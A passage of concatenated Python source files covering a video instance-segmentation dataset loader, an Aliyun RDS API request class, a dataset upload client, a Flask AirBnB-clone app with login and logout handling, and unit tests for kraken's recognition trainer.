        # (long_edge, short_edge) or [(long1, short1), (long2, short2), ...]
        self.img_scales = img_scale if isinstance(img_scale,
                                                  list) else [img_scale]
        assert mmcv.is_list_of(self.img_scales, tuple)
        # normalization configs
        self.img_norm_cfg = img_norm_cfg
        # max proposals per image
        self.num_max_proposals = num_max_proposals
        # flip ratio
        self.flip_ratio = flip_ratio
        assert flip_ratio >= 0 and flip_ratio <= 1
        # padding border to ensure the image size can be divided by
        # size_divisor (used for FPN)
        self.size_divisor = size_divisor
        # with mask or not (reserved field, takes no effect)
        self.with_mask = with_mask
        # some datasets provide bbox annotations as ignore/crowd/difficult,
        # if `with_crowd` is True, then these info is returned.
        self.with_crowd = with_crowd
        # with label is False for RPN
        self.with_label = with_label
        self.with_track = with_track
        self.with_prop = with_prop
        self.with_seg = with_semantic_seg
        # rescale factor for segmentation maps
        self.seg_scale_factor = seg_scale_factor
        # params for augmenting bbox in the reference frame
        self.aug_ref_bbox_param = aug_ref_bbox_param
        # in test mode or not
        self.test_mode = test_mode
        # set group flag for the sampler
        if not self.test_mode:
            self._set_group_flag()
        # transforms
        self.img_transform = ImageTransform(
            size_divisor=self.size_divisor, **self.img_norm_cfg)
        self.bbox_transform = BboxTransform()
        self.mask_transform = MaskTransform()
        self.seg_transform = SegMapTransform(self.size_divisor)
        self.numpy2tensor = Numpy2Tensor()
        # if use extra augmentation
        if extra_aug is not None:
            self.extra_aug = ExtraAugmentation(**extra_aug)
        else:
            self.extra_aug = None
        # with cutBlur augmentation or not
        self.cutblur = CutBlur(**cutblur) if cutblur else None
        # with cutNoise augmentation or not
        self.cutnoise = CutNoise(**{**cutnoise, **img_norm_cfg}) if cutnoise else None
        # with instaboost augmentation or not
        self.instaboost = InstaBoost(**instaboost) if instaboost else None
        # image rescale if keep ratio
        self.resize_keep_ratio = resize_keep_ratio

    def __len__(self):
        """Number of (video, frame) samples."""
        return len(self.img_ids)

    def __getitem__(self, idx):
        """Return a test frame or an augmented training frame pair."""
        if self.test_mode:
            return self.prepare_test_img(self.img_ids[idx])
        data = self.prepare_train_img(self.img_ids[idx])
        return data

    def load_annotations(self, ann_file):
        """Load YTVOS annotations and build category/video lookup tables."""
        self.ytvos = YTVOS(ann_file)
        self.cat_ids = self.ytvos.getCatIds()
        # category_id -> contiguous label starting at 1 (0 is background)
        self.cat2label = {
            cat_id: i + 1
            for i, cat_id in enumerate(self.cat_ids)
        }
        self.vid_ids = self.ytvos.getVidIds()
        vid_infos = []
        for i in self.vid_ids:
            info = self.ytvos.loadVids([i])[0]
            info['filenames'] = info['file_names']
            vid_infos.append(info)
        return vid_infos

    def get_ann_info(self, idx, frame_id):
        """Return parsed annotations for one frame of video ``idx``."""
        vid_id = self.vid_infos[idx]['id']
        ann_ids = self.ytvos.getAnnIds(vidIds=[vid_id])
        ann_info = self.ytvos.loadAnns(ann_ids)
        return self._parse_ann_info(ann_info, frame_id)

    def _set_group_flag(self):
        """Set flag according to image aspect ratio.

        Images with aspect ratio greater than 1 will be set as group 1,
        otherwise group 0.
        """
        self.flag = np.zeros(len(self), dtype=np.uint8)
        for i in range(len(self)):
            vid_id, _ = self.img_ids[i]
            vid_info = self.vid_infos[vid_id]
            if vid_info['width'] / vid_info['height'] > 1:
                self.flag[i] = 1

    def bbox_aug(self, bbox, img_size):
        """Jitter reference-frame boxes by random center offset and resize.

        Controlled by ``aug_ref_bbox_param = (center_off, size_perturb)``;
        results are clipped to the image bounds.
        """
        assert self.aug_ref_bbox_param is not None
        center_off = self.aug_ref_bbox_param[0]
        size_perturb = self.aug_ref_bbox_param[1]
        n_bb = bbox.shape[0]
        # bbox center offset
        center_offs = (2*np.random.rand(n_bb, 2) - 1) * center_off
        # bbox resize ratios
        resize_ratios = (2*np.random.rand(n_bb, 2) - 1) * size_perturb + 1
        # bbox: x1, y1, x2, y2
        centers = (bbox[:, :2] + bbox[:, 2:])/2.
        sizes = bbox[:, 2:] - bbox[:, :2]
        new_centers = centers + center_offs * sizes
        new_sizes = sizes * resize_ratios
        new_x1y1 = new_centers - new_sizes/2.
        new_x2y2 = new_centers + new_sizes/2.
        c_min = [0, 0]
        c_max = [img_size[1], img_size[0]]
        new_x1y1 = np.clip(new_x1y1, c_min, c_max)
        new_x2y2 = np.clip(new_x2y2, c_min, c_max)
        bbox = np.hstack((new_x1y1, new_x2y2)).astype(np.float32)
        return bbox

    def sample_ref(self, idx):
        """Sample another valid frame of the same video as reference."""
        vid, frame_id = idx
        vid_info = self.vid_infos[vid]
        sample_range = range(len(vid_info['filenames']))
        valid_samples = []
        for i in sample_range:
            # check if the frame id is valid
            ref_idx = (vid, i)
            if i != frame_id and ref_idx in self.img_ids:
                valid_samples.append(ref_idx)
        assert len(valid_samples) > 0
        return random.choice(valid_samples)

    def prepare_train_img(self, idx):
        """Load, augment and package a (frame, reference frame) pair.

        Args:
            idx (tuple): ``(video_index, frame_id)``.

        Returns:
            dict: DataContainer-wrapped images, boxes, labels and the
            optional mask/track/seg fields, or ``None`` when proposals are
            configured but empty for this sample.
        """
        vid, frame_id = idx
        vid_info = self.vid_infos[vid]
        # load image and a randomly sampled reference frame
        img = mmcv.imread(
            osp.join(self.img_prefix, vid_info['filenames'][frame_id]))
        _, ref_frame_id = self.sample_ref(idx)
        ref_img = mmcv.imread(
            osp.join(self.img_prefix, vid_info['filenames'][ref_frame_id]))
        # load proposals if necessary
        if self.proposals is not None:
            proposals = self.proposals[idx][:self.num_max_proposals]
            # TODO: Handle empty proposals properly. Currently images with
            # no proposals are just ignored, but they can be used for
            # training in concept.
            if len(proposals) == 0:
                return None
            if not (proposals.shape[1] == 4 or proposals.shape[1] == 5):
                raise AssertionError(
                    'proposals should have shapes (n, 4) or (n, 5), '
                    'but found {}'.format(proposals.shape))
            if proposals.shape[1] == 5:
                scores = proposals[:, 4, None]
                proposals = proposals[:, :4]
            else:
                scores = None
        # According to this blog post (https://www.sicara.ai/blog/2019-01-28-how-computer-generate-random-numbers):
        # we need to be careful when using numpy.random in multiprocess application as it can always generate the
        # same output for different processes. Therefore we use np.random.RandomState().
        random_state = np.random.RandomState()
        ann = self.get_ann_info(vid, frame_id)
        # instaboost augmentation
        if self.instaboost is not None:
            img, ann = self.instaboost({'img': img, 'ann_info': ann},
                                       random_state=random_state).values()
        ref_ann = self.get_ann_info(vid, ref_frame_id)
        gt_bboxes = ann['bboxes']
        gt_labels = ann['labels']
        ref_bboxes = ref_ann['bboxes']
        # obj ids attribute does not exist in current annotation
        # need to add it
        ref_ids = ref_ann['obj_ids']
        gt_ids = ann['obj_ids']
        # compute matching of reference frame with current frame
        # 0 denote there is no matching
        gt_pids = [ref_ids.index(i)+1 if i in ref_ids else 0 for i in gt_ids]
        if self.with_crowd:
            gt_bboxes_ignore = ann['bboxes_ignore']
        # extra augmentation
        if self.extra_aug is not None:
            img, gt_bboxes, gt_labels = self.extra_aug(img, gt_bboxes,
                                                       gt_labels)
        # apply transforms (both frames share the sampled scale and flip)
        flip = True if random_state.rand() < self.flip_ratio else False
        img_scale = random_scale(self.img_scales)  # sample a scale
        img, img_shape, pad_shape, scale_factor = self.img_transform(
            img, img_scale, flip, keep_ratio=self.resize_keep_ratio)
        ref_img, ref_img_shape, _, ref_scale_factor = self.img_transform(
            ref_img, img_scale, flip, keep_ratio=self.resize_keep_ratio)
        # CutBlur augmentation
        if self.cutblur is not None:
            if random_state.rand() < self.cutblur.p:
                img, gt_labels = self.cutblur({'image': img, 'label': gt_labels},
                                              random_state=random_state).values()
                ref_img, _ = self.cutblur({'image': ref_img, 'label': ref_ann['labels']},
                                          random_state=random_state).values()
        # CutNoise augmentation
        if self.cutnoise is not None:
            if random_state.rand() < self.cutnoise.p:
                img, gt_labels = self.cutnoise({'image': img, 'label': gt_labels},
                                               random_state=random_state)
                # BUG FIX: the original applied self.cutblur(...).values() to
                # the reference frame here, so CutNoise was never applied to
                # it. Call CutNoise exactly like the line above (which
                # unpacks its return directly, without .values() -- TODO
                # confirm CutNoise's return convention against its class).
                ref_img, _ = self.cutnoise({'image': ref_img, 'label': ref_ann['labels']},
                                           random_state=random_state)
        img = img.copy()
        ref_img = ref_img.copy()
        if self.proposals is not None:
            proposals = self.bbox_transform(proposals, img_shape, scale_factor,
                                            flip)
            proposals = np.hstack(
                [proposals, scores]) if scores is not None else proposals
        gt_bboxes = self.bbox_transform(gt_bboxes, img_shape,
                                        scale_factor, flip)
        ref_bboxes = self.bbox_transform(ref_bboxes, ref_img_shape,
                                         ref_scale_factor, flip)
        if self.aug_ref_bbox_param is not None:
            ref_bboxes = self.bbox_aug(ref_bboxes, ref_img_shape)
        if self.with_crowd:
            gt_bboxes_ignore = self.bbox_transform(gt_bboxes_ignore, img_shape,
                                                   scale_factor, flip)
        if self.with_mask:
            gt_masks = self.mask_transform(ann['masks'], pad_shape,
                                           scale_factor, flip)
        if self.with_prop:
            # NOTE(review): this uses the *current* frame's pad_shape for the
            # reference masks; the reference frame's own pad shape is
            # discarded above. Confirm both frames always pad identically.
            ref_masks = self.mask_transform(ref_ann['masks'], pad_shape,
                                            ref_scale_factor, flip)
        if self.with_seg:
            gt_seg = np.zeros((vid_info['height'], vid_info['width']), dtype=np.uint8)
            for (label, mask) in zip(ann['labels'], ann['masks']):
                gt_seg += mask * label
            gt_seg = self.seg_transform(gt_seg, img_scale, flip)
            gt_seg = mmcv.imrescale(
                gt_seg, self.seg_scale_factor, interpolation='nearest')
            gt_seg = gt_seg[None, ...]
        ori_shape = (vid_info['height'], vid_info['width'], 3)
        img_meta = dict(
            ori_shape=ori_shape,
            img_shape=img_shape,
            pad_shape=pad_shape,
            scale_factor=scale_factor,
            flip=flip)
        data = dict(
            img=DC(to_tensor(img), stack=True),
            ref_img=DC(to_tensor(ref_img), stack=True),
            img_meta=DC(img_meta, cpu_only=True),
            gt_bboxes=DC(to_tensor(gt_bboxes)),
            ref_bboxes=DC(to_tensor(ref_bboxes))
        )
        if self.proposals is not None:
            data['proposals'] = DC(to_tensor(proposals))
        if self.with_label:
            data['gt_labels'] = DC(to_tensor(gt_labels))
        if self.with_track:
            data['gt_pids'] = DC(to_tensor(gt_pids))
        if self.with_crowd:
            data['gt_bboxes_ignore'] = DC(to_tensor(gt_bboxes_ignore))
        if self.with_mask:
            data['gt_masks'] = DC(gt_masks, cpu_only=True)
        if self.with_prop:
            data['ref_masks'] = DC(ref_masks, cpu_only=True)
        if self.with_seg:
            data['gt_semantic_seg'] = DC(to_tensor(gt_seg), stack=True)
        return data

    def prepare_test_img(self, idx):
        """Prepare an image for testing (multi-scale and flipping)"""
        vid, frame_id = idx
        vid_info = self.vid_infos[vid]
        img = mmcv.imread(
            osp.join(self.img_prefix, vid_info['filenames'][frame_id]))
        proposal = None

        def prepare_single(img, frame_id, scale, flip, proposal=None):
            # Transform one (scale, flip) variant and build its meta dict.
            _img, img_shape, pad_shape, scale_factor = self.img_transform(
                img, scale, flip, keep_ratio=self.resize_keep_ratio)
            _img = to_tensor(_img)
            _img_meta = dict(
                ori_shape=(vid_info['height'], vid_info['width'], 3),
                img_shape=img_shape,
                pad_shape=pad_shape,
                is_first=(frame_id == 0),
                video_id=vid,
                frame_id=frame_id,
                scale_factor=scale_factor,
                flip=flip)
            if proposal is not None:
                if proposal.shape[1] == 5:
                    score = proposal[:, 4, None]
                    proposal = proposal[:, :4]
                else:
                    score = None
                _proposal = self.bbox_transform(proposal, img_shape,
                                                scale_factor, flip)
                _proposal = np.hstack(
                    [_proposal, score]) if score is not None else _proposal
                _proposal = to_tensor(_proposal)
            else:
                _proposal = None
            return _img, _img_meta, _proposal

        imgs = []
        img_metas = []
        proposals = []
        for scale in self.img_scales:
            _img, _img_meta, _proposal = prepare_single(
                img, frame_id, scale, False, proposal)
            imgs.append(_img)
            img_metas.append(DC(_img_meta, cpu_only=True))
            proposals.append(_proposal)
            if self.flip_ratio > 0:
                # BUG FIX: the original omitted ``frame_id`` and passed
                # ``scale`` in its place, raising a TypeError whenever
                # flipping was enabled at test time.
                _img, _img_meta, _proposal = prepare_single(
                    img, frame_id, scale, True, proposal)
                imgs.append(_img)
                img_metas.append(DC(_img_meta, cpu_only=True))
                proposals.append(_proposal)
        data = dict(img=imgs, img_meta=img_metas)
        return data

    def _parse_ann_info(self, ann_info, frame_id, with_mask=True):
        """Parse bbox and mask annotation.

        Args:
            ann_info (list[dict]): Annotation info of an image.
            frame_id (int): Frame index within the video's per-track lists.
            with_mask (bool): Whether to parse mask annotations.

        Returns:
            dict: A dict containing the following keys: bboxes, bboxes_ignore,
                labels, obj_ids, masks, mask_polys, poly_lens.
        """
        gt_bboxes = []
        gt_labels = []
        gt_ids = []
        gt_bboxes_ignore = []
        # Two formats are provided.
        # 1. mask: a binary map of the same size of the image.
        # 2. polys: each mask consists of one or several polys, each poly is a
        # list of float.
        if with_mask:
            gt_masks = []
            gt_mask_polys = []
            gt_poly_lens = []
        for i, ann in enumerate(ann_info):
            # each ann is a list of masks
            # ann:
            # bbox: list of bboxes
            # segmentation: list of segmentation
            # category_id
            # area: list of area
            bbox = ann['bboxes'][frame_id]
            area = ann['areas'][frame_id]
            segm = ann['segmentations'][frame_id]
            if bbox is None:
                continue
            x1, y1, w, h = bbox
            if area <= 0 or w < 1 or h < 1:
                continue
            bbox = [x1, y1, x1 + w - 1, y1 + h - 1]
            if ann['iscrowd']:
                gt_bboxes_ignore.append(bbox)
            else:
                gt_bboxes.append(bbox)
                gt_ids.append(ann['id'])
                gt_labels.append(self.cat2label[ann['category_id']])
            if with_mask:
                gt_masks.append(self.ytvos.annToMask(ann, frame_id))
                # mask_polys = [
                #     p for p in segm if len(p) >= 6
                # ]  # valid polygons have >= 3 points (6 coordinates)
                mask_polys = segm
                poly_lens = [len(p) for p in mask_polys]
                gt_mask_polys.append(mask_polys)
                gt_poly_lens.extend(poly_lens)
        if gt_bboxes:
            gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
            gt_labels = np.array(gt_labels, dtype=np.int64)
        else:
            gt_bboxes = np.zeros((0, 4), dtype=np.float32)
            gt_labels = np.array([], dtype=np.int64)
        if gt_bboxes_ignore:
            gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
        else:
            gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
        ann = dict(
            bboxes=gt_bboxes, labels=gt_labels, obj_ids=gt_ids, bboxes_ignore=gt_bboxes_ignore)
        if with_mask:
            ann['masks'] = gt_masks
            # poly format is not used in the current implementation
            ann['mask_polys'] = gt_mask_polys
            ann['poly_lens'] = gt_poly_lens
        return ann
| StarcoderdataPython |
271224 | <filename>aliyun/api/rest/Rds20140815DescribeTasksRequest.py
'''
Created by auto_sdk on 2015.06.23
'''
from aliyun.api.base import RestApi
class Rds20140815DescribeTasksRequest(RestApi):
    """Request object for the RDS DescribeTasks API (2014-08-15)."""

    # All request parameters start out unset (None) and are filled in
    # by the caller before the request is issued.
    _PARAMS = ('DBInstanceId', 'EndTime', 'Page', 'PageSize', 'StartTime',
               'Status', 'TaskAction', 'ownerId', 'resourceOwnerAccount',
               'resourceOwnerId')

    def __init__(self, domain='rds.aliyuncs.com', port=80):
        RestApi.__init__(self, domain, port)
        for param in self._PARAMS:
            setattr(self, param, None)

    def getapiname(self):
        """Return the fully-qualified API name, including its version."""
        return 'rds.aliyuncs.com.DescribeTasks.2014-08-15'
| StarcoderdataPython |
6458638 | <reponame>alexandersjoberg/sidekick
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from enum import Enum
from pathlib import Path
from typing import Dict, List
import requests
from requests.adapters import HTTPAdapter
from tqdm import tqdm
class Status(Enum):
    # Lifecycle states reported by the Dataset API for a staged upload.
    PROCESSING = 1  # upload received, still being saved server-side
    SUCCESS = 2     # file persisted successfully
    FAILED = 3      # saving failed; the job carries an error message
class UploadJob:
    """One staged file upload and its server-reported status."""

    def __init__(
        self, upload_id: str, status: Status, message: str
    ) -> None:
        self.id = upload_id
        self.status = status
        self.message = message

    @classmethod
    def from_dict(cls, data):
        """Build an UploadJob from a raw API status dictionary."""
        status = Status[data['status']]
        # 'message' is optional in the payload; default to None when absent.
        return cls(data['uploadId'], status, data.get('message'))
class DatasetClient:
    """Client for the Dataset API."""

    _MAX_RETRIES = 3
    _EXTENSION_MAPPING = {
        '.csv': 'text/csv',
        '.zip': 'application/zip',
        '.npy': 'application/npy',
    }
    VALID_EXTENSIONS = set(_EXTENSION_MAPPING.keys())

    def __init__(self, url: str, token: str) -> None:
        """Create a client bound to *url*, authenticating with *token*."""
        self.url = url.rstrip('/')
        self._session = requests.Session()
        # Retry transient failures transparently on every request.
        self._session.mount('', HTTPAdapter(max_retries=self._MAX_RETRIES))
        self._session.headers.update(
            {
                'Authorization': 'Bearer %s' % token,
                'User-Agent': 'sidekick',
            }
        )

    def upload_data(
        self,
        filepaths: List[str],
        name: str = 'Sidekick upload',
        description: str = 'Sidekick upload',
        progress: bool = True,
    ) -> None:
        """Creates a dataset and uploads files to it.

        Args:
            filepaths: List of files to upload to the dataset.
            name: Name of the dataset.
            description: Description of the dataset.
            progress: Print progress.

        Raises:
            FileNotFoundError: One or more filepaths not found.
            ValueError: One or more files have a non supported extension.
            IOError: Error occurred while saving files in dataset.
        """
        paths = [Path(str(path)).resolve() for path in filepaths]
        self._validate_paths(paths)
        wrapper_id = self._create_wrapper(name, description)
        jobs_mapping = self._stage_files(paths, wrapper_id, progress)
        self._wait_until_completed(wrapper_id, jobs_mapping, progress)
        self._complete_upload(wrapper_id)

    def _create_wrapper(self, name: str, description: str) -> str:
        """Create the dataset wrapper and return its id."""
        response = self._session.post(
            url=self.url,
            headers={'Content-Type': 'application/json'},
            json={'name': name, 'description': description}
        )
        response.raise_for_status()
        return response.json()['datasetWrapperId']

    def _get_status(self, wrapper_id: str) -> List[UploadJob]:
        """Fetch the current status of every upload in the wrapper."""
        response = self._session.get(
            url=self.url + '/%s/uploads' % wrapper_id,
        )
        response.raise_for_status()
        jobs = response.json()['uploadStatuses']
        return [UploadJob.from_dict(job) for job in jobs]

    def _complete_upload(self, wrapper_id: str) -> None:
        """Tell the API that all files have been staged."""
        response = self._session.post(
            url=self.url + '/%s/upload_complete' % wrapper_id,
            headers={'Content-Type': 'application/json'}
        )
        response.raise_for_status()

    def _stage_files(
        self, filepaths: List[Path], wrapper_id: str, progress: bool,
    ) -> Dict[str, Path]:
        """Upload all files concurrently; return {upload_id: path}."""
        num_files = len(filepaths)
        status_bar = tqdm(
            total=num_files,
            unit='file',
            desc='Uploading files',
            disable=not progress,
        )
        # BUG FIX: ThreadPoolExecutor raises ValueError for max_workers <= 0,
        # which the original hit when filepaths was empty (min(10, 0) == 0).
        workers = max(1, min(10, num_files))
        with ThreadPoolExecutor(max_workers=workers) as pool:
            future_to_path = {
                pool.submit(self._stage_file, path, wrapper_id): path
                for path in filepaths
            }
            job_mapping = []
            for future in as_completed(future_to_path):
                path = future_to_path[future]
                job_id = future.result()
                job_mapping.append((job_id, path))
                status_bar.update()
        status_bar.close()
        return dict(job_mapping)

    def _stage_file(self, filepath: Path, wrapper_id: str) -> str:
        """Upload a single file; return the server-assigned upload id."""
        content_type = self._EXTENSION_MAPPING[filepath.suffix]
        with filepath.open('rb') as file:
            data = file.read()
        response = self._session.post(
            url=self.url + '/%s/upload' % wrapper_id,
            headers={'Content-Type': content_type},
            data=data
        )
        response.raise_for_status()
        return response.json()['uploadId']

    def _validate_paths(self, paths: List[Path]) -> None:
        """Validates that paths exist and have a supported extension."""
        not_found = [str(path) for path in paths if not path.exists()]
        if not_found:
            raise FileNotFoundError('Files not found: %s' % set(not_found))
        invalid_extension = [
            str(path) for path in paths
            if path.suffix not in self.VALID_EXTENSIONS
        ]
        if invalid_extension:
            raise ValueError(
                'Valid extensions: %s. Given: %s' % (
                    self.VALID_EXTENSIONS, set(invalid_extension))
            )

    def _wait_until_completed(
        self, wrapper_id: str, job_mapping: Dict[str, Path], progress: bool,
    ) -> None:
        """Waits until all jobs are saved.

        Polls the API once a second; raises IOError as soon as any job
        reports FAILED.
        """
        status_bar = tqdm(
            total=len(job_mapping),
            unit='file',
            desc='Saving files',
            disable=not progress,
        )
        ongoing = True
        # Set membership is O(1); the original used a list, giving O(n)
        # lookups per poll. Iteration order is never used.
        successful_jobs = set()  # type: set
        while ongoing:
            ongoing = False
            jobs = self._get_status(wrapper_id)
            for job in jobs:
                if job.status is Status.FAILED:
                    raise IOError(
                        'Error saving file: %s, message: %s' % (
                            job_mapping[job.id], job.message
                        )
                    )
                elif job.status is Status.SUCCESS:
                    if job.id not in successful_jobs:
                        successful_jobs.add(job.id)
                        status_bar.update()
                else:  # status is PROCESSING:
                    ongoing = True
            if ongoing:
                time.sleep(1)
        status_bar.close()
| StarcoderdataPython |
1610911 | #!/usr/bin/python3
"""
Flask App that integrates with AirBnB static HTML Template
"""
from flask import Flask, render_template, request, url_for
import json
from models import storage
import requests
from uuid import uuid4
# flask setup
app = Flask(__name__)
app.url_map.strict_slashes = False
port = 8000
host = '0.0.0.0'
# begin flask page rendering
@app.teardown_appcontext
def teardown_db(exception):
    """Close (i.e. remove) the current SQLAlchemy session after each
    request so connections are not leaked between requests."""
    storage.close()
@app.route('/', methods=['GET', 'POST'])
def main_index():
    """
    Landing page: renders the login form on GET and dispatches
    login / signup / logout form submissions on POST.
    """
    cache_id = uuid4()
    if request.method == 'GET':
        return render_template('index.html', cache_id=cache_id, message=None)

    # POST: decide which auth endpoint to call based on the form action.
    action = request.form.get('action')
    if action not in ('login', 'signup'):
        # The only other form on the page is the logout button.
        return logout(auth_token=request.form.get('logout'))

    endpoint = ('http://0.0.0.0:5001/auth/login' if action == 'login'
                else 'http://0.0.0.0:5001/auth/register')
    body = json.dumps({
        'email': request.form.get('email', None),
        'password': request.form.get('password', None),
    })
    response = requests.post(endpoint,
                             headers={'content-type': 'application/json'},
                             data=body)
    r_data = response.json()
    if r_data.get('error'):
        return render_template('index.html',
                               cache_id=cache_id,
                               message=r_data.get('error'))
    auth_token = r_data.get('auth_token')
    if auth_token is None:
        return render_template('index.html',
                               cache_id=cache_id,
                               message=r_data.get('error'))
    if 'register' in endpoint:
        return render_template('index.html',
                               cache_id=cache_id,
                               message='thank you for signing up')

    # Successful login: gather states and amenities for the places page.
    state_objs = storage.all('State').values()
    states = dict([state.name, state] for state in state_objs)
    amens = list(storage.all('Amenity').values())
    cache_id = uuid4()
    return render_template('places.html', cache_id=cache_id, states=states,
                           amens=amens, auth_token=auth_token)
@app.route('/logout', methods=['GET', 'POST'])
def logout(auth_token=None):
    """
    Revoke the user's auth token with the auth service.

    GET requests are rejected with the 404 page; POST requests read the
    token from the form unless one was passed in directly by a caller
    (main_index delegates here for the logout form action).
    """
    if request.method == 'GET':
        cache_id = uuid4()
        return render_template('404.html', cache_id=cache_id), 404
    cache_id = uuid4()
    if auth_token is None:
        auth_token = request.form.get('logout')
    headers = {
        'content-type': 'application/json',
        'Authorization': 'Bearer {}'.format(auth_token)
    }
    url = 'http://0.0.0.0:5001/auth/logout'
    r = requests.post(url, headers=headers)
    r_data = r.json()
    if r_data.get('error'):
        # BUG FIX: the original passed cache_id=cach_id (undefined name),
        # raising NameError whenever the auth service returned an error.
        return render_template('index.html',
                               cache_id=cache_id,
                               message=r_data.get('error'))
    message = 'You are now logged out.'
    cache_id = uuid4()
    return render_template('index.html',
                           cache_id=cache_id,
                           message=message)
@app.errorhandler(404)
def page_not_found(error):
    """Render the custom 404 page for any unknown route."""
    return render_template('404.html', cache_id=uuid4()), 404
if __name__ == '__main__':
    # Entry point: run the Flask development server on the configured
    # host and port.
    app.run(host=host, port=port)
| StarcoderdataPython |
11264205 | # -*- coding: utf-8 -*-
import unittest
import json
import kraken
from pytest import raises
from pathlib import Path
from kraken.lib import xml
from kraken.lib.train import KrakenTrainer, RecognitionModel, SegmentationModel
from kraken.lib.exceptions import KrakenInputException
thisfile = Path(__file__).resolve().parent
resources = thisfile / 'resources'
class TestKrakenTrainer(unittest.TestCase):
    """
    Tests for KrakenTrainer class
    """
    def setUp(self):
        # Shared fixtures: a PAGE-XML file with baseline ground truth, its
        # parsed form, one legacy bounding-box line image, and a small
        # pretrained model used by the load/adaptation tests below.
        self.xml = resources / '170025120000003,0074.xml'
        self.bls = xml.parse_page(self.xml)
        self.box_lines = [resources / '000236.png']
        self.model = resources / 'model_small.mlmodel'
    def test_krakentrainer_rec_box_load_fail(self):
        """
        Tests that loading a model that does not fit the box dataset raises
        when resize='fail'.
        """
        training_data = self.box_lines
        evaluation_data = self.box_lines
        module = RecognitionModel(format_type='path',
                                  model=self.model,
                                  training_data=training_data,
                                  evaluation_data=evaluation_data,
                                  resize='fail')
        with raises(KrakenInputException):
            module.setup()
    def test_krakentrainer_rec_bl_load_fail(self):
        """
        Tests that the proper exception is raised when loading model not fitting the dataset.
        """
        training_data = [self.xml]
        evaluation_data = [self.xml]
        module = RecognitionModel(format_type='xml',
                                  model=self.model,
                                  training_data=training_data,
                                  evaluation_data=evaluation_data,
                                  resize='fail')
        with raises(KrakenInputException):
            module.setup()
    def test_krakentrainer_rec_box_load_add(self):
        """
        Tests that adaptation works in add mode.
        """
        training_data = self.box_lines
        evaluation_data = self.box_lines
        module = RecognitionModel(format_type='path',
                                  model=self.model,
                                  training_data=training_data,
                                  evaluation_data=evaluation_data,
                                  resize='add')
        module.setup()
        self.assertEqual(module.nn.seg_type, 'bbox')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.GroundTruthDataset)
        trainer = KrakenTrainer(max_steps=1)
        # 'add' keeps existing output units and appends the new ones.
        self.assertEqual(module.nn.named_spec[-1].split("c")[-1], '19')
    def test_krakentrainer_rec_box_load_both(self):
        """
        Tests that adaptation works in both mode.
        """
        training_data = self.box_lines
        evaluation_data = self.box_lines
        module = RecognitionModel(format_type='path',
                                  model=self.model,
                                  training_data=training_data,
                                  evaluation_data=evaluation_data,
                                  resize='both')
        module.setup()
        self.assertEqual(module.nn.seg_type, 'bbox')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.GroundTruthDataset)
        trainer = KrakenTrainer(max_steps=1)
        # 'both' resizes the output layer to exactly the dataset's alphabet.
        self.assertEqual(module.nn.named_spec[-1].split("c")[-1], '16')
    def test_krakentrainer_rec_box_append(self):
        """
        Tests that appending new layers onto a loaded model works.
        """
        training_data = self.box_lines
        evaluation_data = self.box_lines
        module = RecognitionModel(format_type='path',
                                  model=self.model,
                                  append=1,
                                  spec='[Cr4,4,32]',
                                  training_data=training_data,
                                  evaluation_data=evaluation_data)
        module.setup()
        self.assertEqual(module.nn.seg_type, 'bbox')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.GroundTruthDataset)
        # The appended Cr layer must show up after the first retained layer.
        self.assertTrue(module.nn.spec.startswith('[1,48,0,1 Cr{C_0}4,2,1,4,2 Cr{C_1}4,4,32 O{O_2}'))
        trainer = KrakenTrainer(max_steps=1)
    def test_krakentrainer_rec_bl_load(self):
        """
        Tests that loading a model that does not fit the baseline dataset
        raises when resize='fail'.
        """
        training_data = [self.xml]
        evaluation_data = [self.xml]
        module = RecognitionModel(format_type='xml',
                                  model=self.model,
                                  training_data=training_data,
                                  evaluation_data=evaluation_data,
                                  resize='fail')
        with raises(KrakenInputException):
            module.setup()
    def test_krakentrainer_rec_bl_load_add(self):
        """
        Tests that adaptation works in add mode with baseline (XML) data.
        """
        training_data = [self.xml]
        evaluation_data = [self.xml]
        module = RecognitionModel(format_type='xml',
                                  model=self.model,
                                  training_data=training_data,
                                  evaluation_data=evaluation_data,
                                  resize='add')
        module.setup()
        self.assertEqual(module.nn.seg_type, 'baselines')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
        trainer = KrakenTrainer(max_steps=1)
        self.assertEqual(module.nn.named_spec[-1].split("c")[-1], '60')
    def test_krakentrainer_rec_bl_load_both(self):
        """
        Tests that adaptation works in both mode with baseline (XML) data.
        """
        training_data = [self.xml]
        evaluation_data = [self.xml]
        module = RecognitionModel(format_type='xml',
                                  model=self.model,
                                  training_data=training_data,
                                  evaluation_data=evaluation_data,
                                  resize='both')
        module.setup()
        self.assertEqual(module.nn.seg_type, 'baselines')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
        trainer = KrakenTrainer(max_steps=1)
        self.assertEqual(module.nn.named_spec[-1].split("c")[-1], '60')
    def test_krakentrainer_rec_bl_append(self):
        """
        Tests that appending new layers onto a loaded model works with
        baseline (XML) data.
        """
        training_data = [self.xml]
        evaluation_data = [self.xml]
        module = RecognitionModel(format_type='xml',
                                  model=self.model,
                                  append=1,
                                  spec='[Cr4,4,32]',
                                  training_data=training_data,
                                  evaluation_data=evaluation_data)
        module.setup()
        self.assertEqual(module.nn.seg_type, 'baselines')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
        self.assertTrue(module.nn.spec.startswith('[1,48,0,1 Cr{C_0}4,2,1,4,2 Cr{C_1}4,4,32 O{O_2}'))
        trainer = KrakenTrainer(max_steps=1)
    def test_krakentrainer_rec_box_path(self):
        """
        Tests recognition trainer constructor with legacy path training data.
        """
        training_data = self.box_lines
        evaluation_data = self.box_lines
        module = RecognitionModel(format_type='path',
                                  training_data=training_data,
                                  evaluation_data=evaluation_data)
        module.setup()
        self.assertEqual(module.nn.seg_type, 'bbox')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.GroundTruthDataset)
        trainer = KrakenTrainer(max_steps=1)
    def test_krakentrainer_rec_bl_xml(self):
        """
        Tests recognition trainer constructor with XML training data.
        """
        training_data = [self.xml]
        evaluation_data = [self.xml]
        module = RecognitionModel(format_type='xml',
                                  training_data=training_data,
